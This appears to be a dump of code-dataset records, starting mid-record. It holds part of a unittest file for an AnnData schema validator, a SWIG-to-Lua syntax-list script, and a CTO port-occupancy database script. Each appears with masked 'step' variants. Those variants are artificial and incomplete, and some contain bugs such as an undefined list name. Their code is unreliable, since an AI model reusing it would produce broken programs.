)\n\n def test_obsm_values_at_least_one_X(self):\n\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n\n self.validator.adata.obsm[\"umap\"] = self.validator.adata.obsm[\"X_umap\"]\n self.validator.adata.uns[\"default_embedding\"] = \"umap\"\n del self.validator.adata.obsm[\"X_umap\"]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: At least one embedding in 'obsm' has to have a \"\n \"key with an 'X_' prefix.\"\n ],\n )\n\n def test_obsm_shape(self):\n\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n\n # Makes 1 column array\n self.validator.adata.obsm[\"X_umap\"] = numpy.delete(\n self.validator.adata.obsm[\"X_umap\"], 0, 1\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings must have as many rows as cells, and \"\n \"at least two columns.'adata.obsm['X_umap']' has shape \"\n \"of '(2, 1)'.\"\n ],\n )\n\n\nclass TestAddingLabels(unittest.TestCase):\n\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. 
The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n\n # Manually created data (positive control)\n cls.adata_with_labels = examples.adata_with_labels\n\n # Validate test data\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n\n # Add labels through validator\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n\n for column in [\"feature_name\", \"feature_reference\"]:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. 
\" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n\n for column in [\n \"assay\",\n \"cell_type\",\n \"development_stage\",\n \"disease\",\n \"ethnicity\",\n \"organism\",\n \"sex\",\n \"tissue\",\n ]:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-ids": [
43,
45,
50,
57,
75
]
}
|
[
43,
45,
50,
57,
75
] |
__author__ = 'NikolaiEgorov'
def Lad(a1, a2, b1, b2):
if (a1 == b1) | (a2 == b2):
return 'YES'
else:
return 'NO'
a1 = int(input())
a2 = int(input())
b1 = int(input())
b2 = int(input())
print(Lad(a1, a2, b1, b2))
|
normal
|
{
"blob_id": "0f55b598058b65c9dbf9cd4761d1ff6fc7091b19",
"index": 8791,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\n<mask token>\nprint(Lad(a1, a2, b1, b2))\n",
"step-4": "__author__ = 'NikolaiEgorov'\n\n\ndef Lad(a1, a2, b1, b2):\n if (a1 == b1) | (a2 == b2):\n return 'YES'\n else:\n return 'NO'\n\n\na1 = int(input())\na2 = int(input())\nb1 = int(input())\nb2 = int(input())\nprint(Lad(a1, a2, b1, b2))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#! /usr/bin/python
#
# convert the swig -debug-lsymbols output text file format into
# a simple list of lua module names and classes
#
# Dan Wilcox <[email protected]> 2017
#
import sys
import re
if len(sys.argv) < 3:  # both MODULENAME and INFILE are required (argv[1] and argv[2])
    print("USAGE: lua_syntax.py MODULENAME INFILE")
    exit(0)
module = sys.argv[1]
infile = sys.argv[2]
sections = []
sectionMatches = [
"string", # swig std::string wrappers
"string.SwigStatic" # swig std::string wrappers
]
sectionEnds = [
"Vector" # swig std::vector wrappers
]
lineMatches = [
"string", # swig std::string wrappers
"lua:cdata", # c pointers
]
lineStarts = [
"~", # destructors
"__", # lua metatable __add, __sub, etc
"of", # of core type prefixes
"ofx" # ofx addon type prefixes
]
lineEnds = [
"Vector" # swig std::vector wrappers
]
# any other user-supplied section ignores are added to the section match list so they get dropped
for arg in sys.argv[3:]:
    sectionMatches.append(arg)
# check if a string matches one in an array
def matches(needle, haystack):
for straw in haystack:
if needle == straw:
return True
return False
# append a section to the sections array if the name passes muster
def appendSection(section):
# drop static classes which don't have any symbols
if len(section) < 2:
return
# section names are followed by a " -", so double check
if not section[0].endswith("-"):
print("warning: section name does not end with -: "+section[0])
return
# grab first non-whitespace name ie. "Color" from "Color -"
    match = re.match(r"\S+", section[0])
if match:
if section[0] == "-": # main module is just a "-"
section[0] = module
else: # class name
section[0] = match.group(0)
else:
print("warning: section name had no non-whitespace match: "+section[0])
return
# drop sections which match certain strings
if matches(section[0], sectionMatches):
return
# drop sections which contain certain strings
if any(section[0].endswith(x) for x in sectionEnds):
return
# if got this far, the section must be good...
sections.append(section)
# parse swig output into sections
file = open(infile)
section = []
for line in file:
# strip whitespace
line = line.strip()
# ignore beginning and end lines
if line.startswith("LANGUAGE"):
continue
# section headers are a series of = chars, ie. ==========
if line.startswith("="):
appendSection(section)
section = []
# append line within a section
else:
# empty line
if len(line) == 0:
continue
# drop lines with certain prefixes
if any(line.startswith(x) for x in lineStarts):
continue
# drop lines with certain suffixes
if any(line.endswith(x) for x in lineEnds):
continue
# drop lines which match certain strings
if matches(line, lineMatches):
continue
# line must be good
section.append(line)
appendSection(section) # catch any left overs
file.close()
section = []
# for section in sections:
# print(section)
# exit(0)
# output module & section names to each section line
file = open(module+"_syntax.txt", "w")
num = 0
for section in sections:
# grab name from first line and output
prefix = " "
name = section[0]
if name == module: # main module
prefix = module+"."
file.write(module+"\n")
elif name.endswith(".SwigStatic"): # static members
name = name.split(".")[0] # drop SwigStatic suffix
prefix = module+"."+name+"."
else: # class instance members
file.write(module+"."+name+"\n")
# sort remaining lines
lines = section[1:]
lines.sort()
# output with module.class prefix
for line in lines:
if not line.endswith(".SwigStatic"): # drop statics from main module
file.write(prefix+line+"\n")
num = num + 1
# linebreak between sections
if num < len(sections):
file.write("\n")
file.close()
|
normal
|
{
"blob_id": "c712875273f988a3aa6dab61f79e99a077823060",
"index": 807,
"step-1": "<mask token>\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\n<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\n<mask token>\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\n<mask token>\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n section.append(line)\nappendSection(section)\nfile.close()\n<mask token>\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = ['string', 'string.SwigStatic']\nsectionEnds = ['Vector']\nlineMatches = ['string', 'lua:cdata']\nlineStarts = ['~', '__', 'of', 'ofx']\nlineEnds = ['Vector']\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\nfile = open(infile)\nsection = []\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n section.append(line)\nappendSection(section)\nfile.close()\nsection = []\nfile = open(module + '_syntax.txt', 'w')\nnum = 0\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-4": "import sys\nimport re\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = ['string', 'string.SwigStatic']\nsectionEnds = ['Vector']\nlineMatches = ['string', 'lua:cdata']\nlineStarts = ['~', '__', 'of', 'ofx']\nlineEnds = ['Vector']\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\nfile = open(infile)\nsection = []\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n section.append(line)\nappendSection(section)\nfile.close()\nsection = []\nfile = open(module + '_syntax.txt', 'w')\nnum = 0\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-5": "#! /usr/bin/python\n#\n# convert the swig -debug-lsymbols output text file format into\n# a simple list of lua module names and classes\n#\n# Dan Wilcox <[email protected]> 2017\n#\nimport sys\nimport re\n\nif len(sys.argv) < 2:\n print(\"USAGE: lua_syntax.py MODULENAME INFILE\")\n exit(0)\n\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = [\n \"string\", # swig std::string wrappers\n \"string.SwigStatic\" # swig std::string wrappers\n]\nsectionEnds = [\n \"Vector\" # swig std::vector wrappers\n]\nlineMatches = [ \n \"string\", # swig std::string wrappers\n \"lua:cdata\", # c pointers\n]\nlineStarts = [\n \"~\", # destructors\n \"__\", # lua metatable __add, __sub, etc\n \"of\", # of core type prefixes\n \"ofx\" # ofx addon type prefixes\n]\nlineEnds = [\n \"Vector\" # swig std::vector wrappers\n]\n\n# any other user-supplied section ignores\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n# check if a string matches one in an array\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n# append a section to the sections array if the name passes muster\ndef appendSection(section):\n # drop static classes which don't have any symbols\n if len(section) < 2:\n return\n # section names are followed by a \" -\", so double check\n if not section[0].endswith(\"-\"):\n print(\"warning: section name does not end with -: \"+section[0])\n return\n # grab first non-whitespace name ie. \"Color\" from \"Color -\"\n match = re.match(\"\\S+\", section[0])\n if match:\n if section[0] == \"-\": # main module is just a \"-\"\n section[0] = module\n else: # class name\n section[0] = match.group(0)\n else:\n print(\"warning: section name had no non-whitespace match: \"+section[0])\n return\n # drop sections which match certain strings\n if matches(section[0], sectionMatches):\n return\n # drop sections which contain certain strings\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n # if got this far, the section must be good...\n sections.append(section)\n\n# parse swig output into sections\nfile = open(infile)\nsection = []\nfor line in file:\n # strip whitespace\n line = line.strip()\n # ignore beginning and end lines\n if line.startswith(\"LANGUAGE\"):\n continue\n # section headers are a series of = chars, ie. 
==========\n if line.startswith(\"=\"):\n appendSection(section)\n section = []\n # append line within a section\n else:\n # empty line\n if len(line) == 0:\n continue\n # drop lines with certain prefixes\n if any(line.startswith(x) for x in lineStarts):\n continue\n # drop lines with certain suffixes\n if any(line.endswith(x) for x in lineEnds):\n continue\n # drop lines which match certain strings\n if matches(line, lineMatches):\n continue\n # line must be good\n section.append(line)\nappendSection(section) # catch any left overs\nfile.close()\nsection = []\n\n# for section in sections:\n# print(section)\n# exit(0)\n\n# output module & section names to each section line\nfile = open(module+\"_syntax.txt\", \"w\")\nnum = 0\nfor section in sections:\n\n # grab name from first line and output\n prefix = \" \"\n name = section[0]\n if name == module: # main module\n prefix = module+\".\"\n file.write(module+\"\\n\")\n elif name.endswith(\".SwigStatic\"): # static members\n name = name.split(\".\")[0] # drop SwigStatic suffix\n prefix = module+\".\"+name+\".\"\n else: # class instance members\n file.write(module+\".\"+name+\"\\n\")\n\n # sort remaining lines\n lines = section[1:]\n lines.sort()\n\n # output with module.class prefix\n for line in lines:\n if not line.endswith(\".SwigStatic\"): # drop statics from main module\n file.write(prefix+line+\"\\n\")\n num = num + 1\n\n # linebreak between sections\n if num < len(sections):\n file.write(\"\\n\")\nfile.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from CTO import CTO
#from UI import UIManager
from Cidades import Cidades
from Database import Database
from datetime import datetime
class Main:
def __init__(self, cidade_filename="", dados_filename=""):
#cidade_filename, dados_filename = UIManager().get_filenames()
print("cidade: " + cidade_filename)
self.cidades = Cidades(cidade_filename)
if dados_filename != "":
self.processaCSV(dados_filename)
self.recuperaDados()
self.insereDados()
def processaCSV(self, filename):
with open(filename, 'r', encoding='ISO-8859-1') as input_file:
self.concessao = {}
self.expansao = {}
for line in input_file.readlines():
attributes = line.split(';')
localidade = str(attributes[14])
estacao = str(attributes[15])
cto = str(attributes[1])
status = str(attributes[13])
if localidade in self.cidades.concessao:
if cto in self.concessao:
self.concessao[cto].addLeitura(status)
else:
self.concessao[cto] = CTO(localidade, estacao, cto)
self.concessao[cto].addLeitura(status)
elif localidade in self.cidades.expansao:
if cto in self.expansao:
self.expansao[cto].addLeitura(status)
else:
self.expansao[cto] = CTO(localidade, estacao, cto)
self.expansao[cto].addLeitura(status)
def insereDados(self):
hoje = datetime.utcnow()
#hoje = datetime(2019, 1, 25)
argsCn = []
for nome, cto in self.concessao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoConcessao[nomeCto][8]
antigoData = self.antigoConcessao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoConcessao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsCn.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
argsEx = []
for nome, cto in self.expansao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoExpansao[nomeCto][8]
antigoData = self.antigoExpansao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoExpansao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsEx.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
db = Database()
query = """INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsCn)
query = """INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsEx)
def recuperaDados(self):
db = Database()
self.antigoConcessao = {}
self.antigoExpansao = {}
for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):
self.antigoConcessao[registro[4]] = registro
for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):
self.antigoExpansao[registro[4]] = registro
if __name__ == '__main__':
Main()
|
normal
|
{
"blob_id": "c5f46be6d7214614892d227c76c75e77433a8fa9",
"index": 9517,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\nif __name__ == 